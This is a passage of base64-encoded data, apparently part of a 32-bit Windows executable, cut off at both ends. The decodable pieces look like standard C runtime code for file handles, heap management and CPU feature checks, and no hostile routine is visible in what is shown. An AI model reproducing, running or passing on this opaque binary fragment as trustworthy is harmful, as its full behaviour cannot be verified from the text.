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1EP91DP91CP91HP8VKOFAAIv4O/N0B1borJr//1mLx41l7F9eW4tN/DPN6GRj///Jw4v/VYvsg+wQ/3UIjU3w6Fh0////dSSNTfD/dSD/dRz/dRj/dRT/dRD/dQzoFv7//4PEHIB9/AB0B4tN+INhcP3Jw4v/VYvsVot1CIX2D4SBAQAA/3YE6Dya////dgjoNJr///92DOgsmv///3YQ6CSa////dhToHJr///92GOgUmv///zboDZr///92IOgFmv///3Yk6P2Z////dijo9Zn///92LOjtmf///3Yw6OWZ////djTo3Zn///92HOjVmf///3Y46M2Z////djzoxZn//4PEQP92QOi6mf///3ZE6LKZ////dkjoqpn///92TOiimf///3ZQ6JqZ////dlTokpn///92WOiKmf///3Zc6IKZ////dmDoepn///92ZOhymf///3Zo6GqZ////dmzoYpn///92cOhamf///3Z06FKZ////dnjoSpn///92fOhCmf//g8RA/7aAAAAA6DSZ////toQAAADoKZn///+2iAAAAOgemf///7aMAAAA6BOZ////tpAAAADoCJn///+2lAAAAOj9mP///7aYAAAA6PKY////tpwAAADo55j///+2oAAAAOjcmP///7akAAAA6NGY////tqgAAADoxpj//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFeB5BAHQHUOijmP//WYtGBDsFfB5BAHQHUOiRmP//WYt2CDs1gB5BAHQHVuh/mP//WV5dw4v/VYvsVot1CIX2dH6LRgw7BYQeQQB0B1DoXZj//1mLRhA7BYgeQQB0B1DoS5j//1mLRhQ7BYweQQB0B1DoOZj//1mLRhg7BZAeQQB0B1DoJ5j//1mLRhw7BZQeQQB0B1DoFZj//1mLRiA7BZgeQQB0B1DoA5j//1mLdiQ7NZweQQB0B1bo8Zf//1leXcPMzMzMzMzMzFWL7FYzwFBQUFBQUFBQi1UMjUkAigIKwHQJg8IBD6sEJOvxi3UIg8n/jUkAg8EBigYKwHQJg8YBD6MEJHPui8GDxCBeycPMzMzMzMzMzMzMi1QkBItMJAj3wgMAAAB1PIsCOgF1LgrAdCY6YQF1JQrkdB3B6BA6QQJ1GQrAdBE6YQN1EIPBBIPCBArkddKL/zPAw5AbwNHgg8ABw/fCAQAAAHQYigKDwgE6AXXng8EBCsB03PfCAgAAAHSkZosCg8ICOgF1zgrAdMY6YQF1xQrkdL2DwQLriMzMzMzMzMzMVYvsVjPAUFBQUFBQUFCLVQyNSQCKAgrAdAmDwgEPqwQk6/GLdQiL/4oGCsB0DIPGAQ+jBCRz8Y1G/4PEIF7Jw4v/VYvsUVaLdQxW6PB+//+JRQyLRgxZqIJ1Gegtbv//xwAJAAAAg04MILj//wAA6T0BAACoQHQN6BBu///HACIAAADr4agBdBeDZgQAqBAPhI0AAACLTgiD4P6JDolGDItGDINmBACDZfwAU2oCg+DvWwvDiUYMqQwBAAB1LOhFdP//g8AgO/B0DOg5dP//g8BAO/B1Df91DOiOrf//WYXAdQdW6Dqt//9Z90YMCAEAAFcPhIMAAACLRgiLPo1IA